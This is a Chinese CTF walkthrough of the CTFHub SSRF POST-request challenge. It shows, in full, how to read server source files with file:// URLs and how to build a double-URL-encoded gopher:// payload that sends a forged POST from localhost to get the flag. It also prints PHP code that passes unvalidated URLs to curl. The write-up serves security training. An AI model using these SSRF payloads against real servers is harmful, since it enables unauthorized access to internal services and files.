[PHP知识库] CTFHub技能树 Web-SSRF POST请求

开发: C++知识库 Java知识库 JavaScript Python PHP知识库人工智能区块链大数据移动开发嵌入式开发工具数据结构与算法开发测试游戏开发网络协议系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑笔记本显卡显示器固态硬盘硬盘耳机手机 iphone vivo oppo 小米华为单反装机图拉丁

-> PHP知识库 -> CTFHub技能树 Web-SSRF POST请求 -> 正文阅读

[PHP知识库]CTFHub技能树 Web-SSRF POST请求

POST请求

hint：这次是发一个HTTP POST请求，对了，ssrf是用php的curl实现的，并且会跟踪302跳转，加油吧骚年。

启动环境，访问页面为空白，查看URL：

http://challenge-d01ce204edb10174.sandbox.ctfhub.com:10800/?url=_

通过 GET 传参直接拼接上127.0.0.1/flag.php，访问后得到一个输入框：
在这里插入图片描述
查看源码：

<form action="/flag.php" method="post">
	<input type="text" name="key">
	<!-- Debug: key=f393a2c1ceb90e9f62cdcede1ac8af82-->
</form>

得到key值，输入后：
在这里插入图片描述
提示只允许从127.0.0.1访问，尝试通过file协议读取index.php以及flag.php页面的源码，构造如下 Payload：

?url=file:///var/www/html/index.php
?url=file:///var/www/html/flag.php

得到index.php页面源码如下：

<?php

error_reporting(0);

if (!isset($_REQUEST['url'])){
    header("Location: /?url=_");
    exit;
}

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_REQUEST['url']);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_exec($ch);
curl_close($ch);

得到flag.php页面源码如下：

<?php

error_reporting(0);

if ($_SERVER["REMOTE_ADDR"] != "127.0.0.1") {
    echo "Just View From 127.0.0.1";
    return;
}

$flag=getenv("CTFHUB");
$key = md5($flag);

if (isset($_POST["key"]) && $_POST["key"] == $key) {
    echo $flag;
    exit;
}
?>

<form action="/flag.php" method="post">
	<input type="text" name="key">
	<!-- Debug: key=<?php echo $key;?>-->
</form>

尝试使用 Gopher 协议向服务器发送 POST 包
首先构造 Gopher协议所需的 POST请求：

POST /flag.php HTTP/1.1
Host: 127.0.0.1:80
Content-Length: 36
Content-Type: application/x-www-form-urlencoded

key=f393a2c1ceb90e9f62cdcede1ac8af82

注：在使用 Gopher协议发送 POST请求包时，Host、Content-Type和Content-Length请求头是必不可少的，但在 GET请求中可以没有。

在向服务器发送请求时，首先浏览器会进行一次 URL解码，其次服务器收到请求后，在执行curl功能时，进行第二次 URL解码。

所以我们需要对构造的请求包进行两次 URL编码：
将构造好的请求包进行第一次 URL编码：
在这里插入图片描述
注：在第一次编码后的数据中，将%0A全部替换为%0D%0A。因为 Gopher协议包含的请求数据包中，可能包含有=、&等特殊字符，避免与服务器解析传入的参数键值对混淆，所以对数据包进行 URL编码，这样服务端会把%后的字节当做普通字节。

再进行第二次 URL编码得到如下 Gopher请求内容：

POST%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%253A80%250D%250AContent-Length%253A%252036%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250A%250D%250Akey%253Df393a2c1ceb90e9f62cdcede1ac8af82

因为flag.php中的$_SERVER["REMOTE_ADDR"]无法绕过，只能通过index.php页面中的curl功能向目标发送 POST请求，构造如下Payload：

?url=gopher://127.0.0.1:80/_POST%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%253A80%250D%250AContent-Length%253A%252036%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250A%250D%250Akey%253Df393a2c1ceb90e9f62cdcede1ac8af82

向目标发送数据包，得到 flag：
在这里插入图片描述